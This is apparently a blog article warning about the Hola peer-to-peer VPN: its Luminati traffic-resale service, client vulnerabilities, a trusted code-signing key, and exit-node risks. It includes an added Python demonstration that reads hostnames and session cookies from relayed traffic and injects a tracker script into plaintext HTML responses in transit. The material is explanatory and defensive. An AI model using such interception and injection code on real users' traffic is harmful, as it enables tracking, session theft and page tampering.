The Hola peer-to-peer VPN service was hit by a series of very damaging security revelations today. Hola claims that there are (or were) about 45 million active users of the service.
The first problem is that Hola sells a service called Luminati which lets anyone pay to route traffic through all the other users' computers, effectively renting them out as a giant botnet. It looks like the website 8chan was recently attacked using this capability. Researchers have demonstrated that Hola does not screen the people to whom it sells this service, nor does it monitor or enforce any kind of terms of service. To me this is recklessly irresponsible behavior.
In addition, researchers found a number of major vulnerabilities in the Hola client (some of which have now been fixed). These vulnerabilities allowed attackers to exploit the client and take full control of the user's computer. There was also a console which allowed an attacker to download software, move files on the user's computer, and more. This is effectively an open back door to the machine.
Worst of all, Hola installed its own code-signing key into the Windows operating system as a trusted key. Any software signed with that key is treated as completely legitimate by the computer, so anyone holding that key (Hola itself, or anyone who steals it) can install whatever they like without the user's consent or any warning. This is a gigantic failure in security architecture. Either they did not know what they were doing (which is not at all good), or they did (which is even worse).
Finally, the basic peer-to-peer nature of Hola inherently puts its users at risk. By design your web traffic exits through some other user's computer, and someone else's traffic exits through yours. So let's look at each of those situations.
Your traffic is going out through some random person's computer. For unencrypted (HTTP) traffic that person can capture everything you send and receive, monitor your activities, and insert trackers and malware into the pages you load; even for HTTPS traffic they still learn which sites you connect to and when, since the destination hostname is sent in the clear at the start of the connection. This is similar to the problem with malicious Tor exit nodes, but here there are even fewer checks and balances, and a much lower barrier to entry.
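What the peer relaying your traffic actually gets to see and do, as an added example that is not Hola's or Luminati's code: the functions below show that a plaintext HTTP request exposes the full URL and cookies and that a plaintext HTML response can be rewritten in transit, while for HTTPS the relay still learns the destination hostname from the TLS ClientHello even though the content is encrypted. The hostnames, cookie, tracker URL and sample messages are constructed for the demonstration, and the ClientHello builder is a minimal stand-in for what a real browser sends.

```python
"""
Added example (not Hola/Luminati code): what a peer acting as your exit node
can learn from the first bytes of a connection it relays, and what it can do to
a plaintext HTTP response passing through it. All hosts, cookies, URLs and
messages below are constructed for the demonstration.
"""
import struct

# Assumed (constructed) tracker the malicious exit node wants every page to load.
TRACKER = b'<script src="http://tracker.example/t.js"></script>'


def build_client_hello(hostname: str) -> bytes:
    """Build a minimal TLS 1.2 ClientHello record carrying only an SNI extension.
    Only used to construct sample input; real clients send many more fields."""
    host = hostname.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(host)) + host       # name_type host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list  # extension type 0 = server_name
    extensions = struct.pack("!H", len(sni_ext)) + sni_ext
    body = (
        b"\x03\x03"             # client_version: TLS 1.2
        + b"\x00" * 32          # client random (zeros; sample only)
        + b"\x00"               # session_id length 0
        + b"\x00\x02\x13\x01"   # one cipher suite (TLS_AES_128_GCM_SHA256)
        + b"\x01\x00"           # one compression method (null)
        + extensions
    )
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body   # type client_hello, 3-byte length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def sni_from_client_hello(data: bytes):
    """Return the server_name from a TLS ClientHello, or None if absent/malformed.
    TLS encrypts the HTTP exchange, but the destination hostname in the
    ClientHello is sent in the clear, so the relaying peer still learns it."""
    try:
        if data[0] != 0x16 or data[5] != 0x01:
            return None
        pos = 9 + 2 + 32                           # record hdr, handshake hdr, version, random
        pos += 1 + data[pos]                       # session_id
        pos += 2 + struct.unpack("!H", data[pos:pos + 2])[0]   # cipher_suites
        pos += 1 + data[pos]                       # compression_methods
        ext_end = pos + 2 + struct.unpack("!H", data[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= ext_end:
            ext_type, ext_len = struct.unpack("!HH", data[pos:pos + 4])
            pos += 4
            if ext_type == 0:                      # server_name: list_len(2) type(1) name_len(2) name
                name_len = struct.unpack("!H", data[pos + 3:pos + 5])[0]
                return data[pos + 5:pos + 5 + name_len].decode("ascii", "replace")
            pos += ext_len
    except (IndexError, struct.error):
        pass
    return None


def exit_node_view(first_bytes: bytes) -> dict:
    """Summarise what the relaying peer sees from the start of a connection."""
    if first_bytes[:1] == b"\x16":                 # TLS record: content hidden, hostname not
        return {"kind": "tls", "destination": sni_from_client_hello(first_bytes),
                "url": None, "cookie": None, "content_readable": False}
    head = first_bytes.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"kind": "http", "destination": headers.get("host"),
            "url": f"{method} http://{headers.get('host', '')}{path}",
            "cookie": headers.get("cookie"), "content_readable": True}


def inject_tracker(response: bytes) -> bytes:
    """Rewrite a plaintext HTML response in transit to add TRACKER before </body>,
    keeping Content-Length consistent. Anything that is not a plaintext HTML
    response (including TLS records) is passed through unchanged."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if b"content-type: text/html" not in head.lower() or b"</body>" not in body:
        return response
    body = body.replace(b"</body>", TRACKER + b"</body>", 1)
    fixed = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(body)).encode()
        fixed.append(line)
    return b"\r\n".join(fixed) + sep + body


# Constructed sample traffic.
HTTP_REQUEST = (b"GET /cart?item=42 HTTP/1.1\r\nHost: shop.example\r\n"
                b"Cookie: session=abc123\r\n\r\n")
HTTPS_REQUEST = build_client_hello("mail.example.com")
HTTP_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                 b"Content-Length: 28\r\n\r\n<html><body>hi</body></html>")

if __name__ == "__main__":
    print(exit_node_view(HTTP_REQUEST))
    print(exit_node_view(HTTPS_REQUEST))
    print(inject_tracker(HTTP_RESPONSE))
```

Running it on the TLS sample shows that encryption narrows what the exit node sees to the hostname and timing, but does not remove that metadata; running `inject_tracker` on the plaintext response shows that nothing stops the relay from altering what the user receives, and the browser has no way to tell.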
If someone is doing something illegal through your connection, like publishing child pornography, it will appear to be coming from your internet connection. While you might eventually be able to prove that you were not the source, you could be raided by a SWAT team and spend a few months in jail first.
The only safe course of action is to completely uninstall Hola immediately (instructions HERE). Once it is gone, it is also worth checking that nothing it installed, such as its trusted key, is still present on the system.
This shows once again the importance of choosing a privacy service provider based on reputation and track record. The operators of the service should be known and public, and the service must have a track record of strong security and sound product design, and a proven record of resisting attacks and legal pressure.